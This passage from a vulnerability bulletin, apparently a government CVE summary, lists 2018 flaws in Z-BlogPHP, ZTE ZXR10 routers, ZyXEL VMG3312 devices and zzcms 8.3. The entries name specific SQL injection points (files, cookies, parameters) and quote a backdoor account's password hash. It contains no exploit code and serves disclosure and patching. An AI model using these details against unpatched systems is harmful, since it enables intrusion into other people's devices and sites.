    CSRF exists in zb_users/plugin/AppCentre/theme.js.php in Z-BlogPHP 1.5.2.1935 (Zero), which allows remote attackers to execute arbitrary PHP code.2018-10-30not yet calculatedCVE-2018-18842
    MISC
    MISC
    zte -- zxr10_8905e
     
    All versions up to V3.03.10.B23P2 of ZTE ZXR10 8905E product are impacted by TCP Initial Sequence Number (ISN) reuse vulnerability, which can generate easily predictable ISN, and allows remote attackers to spoof connections.2018-11-01not yet calculatedCVE-2018-7356
    CONFIRM
    zyxel -- vmg3312-b10b_devices
     
    ZyXEL VMG3312-B10B 1.00(AAPP.7) devices have a backdoor root account with the tTn3+Z@!Sr0O+ password hash in the etc/default.cfg file.2018-10-29not yet calculatedCVE-2018-18754
    MISC
    zzcms -- zzcmsAn issue was discovered in zzcms 8.3. SQL Injection exists in zs/search.php via a pxzs cookie.2018-10-29not yet calculatedCVE-2018-18791
    MISC
    zzcms -- zzcmsAn issue was discovered in zzcms 8.3. SQL Injection exists in zt/top.php via a Host HTTP header to zt/news.php.2018-10-29not yet calculatedCVE-2018-18789
    MISC
    zzcms -- zzcmsAn issue was discovered in zzcms 8.3. SQL Injection exists in admin/classmanage.php via the tablename parameter. (This needs an admin user login.)2018-10-29not yet calculatedCVE-2018-18788
    MISC
    zzcms -- zzcmsAn issue was discovered in zzcms 8.3. SQL Injection exists in zs/zs.php via a pxzs cookie.2018-10-29not yet calculatedCVE-2018-18787
    MISC
    zzcms -- zzcmsAn issue was discovered in zzcms 8.3. SQL Injection exists in zs/subzs.php with a zzcmscpid cookie to zs/search.php.2018-10-29not yet calculatedCVE-2018-18785
    MISC
    zzcms -- zzcmsAn issue was discovered in zzcms 8.3. SQL Injection exists in admin/tagmanage.php via the tabletag parameter. (This needs an admin user login.)2018-10-29not yet calculatedCVE-2018-18784
    MISC
    zzcms -- zzcmsAn issue was discovered in zzcms 8.3. SQL Injection exists in ajax/zs.php via a pxzs cookie.2018-10-29not yet calculatedCVE-2018-18786
    MISC
    zzcms -- zzcms
     
    An issue was discovered in zzcms 8.3. SQL Injection exists in admin/special_add.php via a zxbigclassid cookie. (This needs an admin user login.)2018-10-29not yet calculatedCVE-2018-18790
    MISC
    zzcms -- zzcms
     
    An issue was discovered in zzcms 8.3. SQL Injection exists in zs/zs_list.php via a pxzs cookie.2018-10-29not yet calculatedCVE-2018-18792
    MISC
    Back to top

    This product is provided subject to this Notification and this Privacy & Use policy.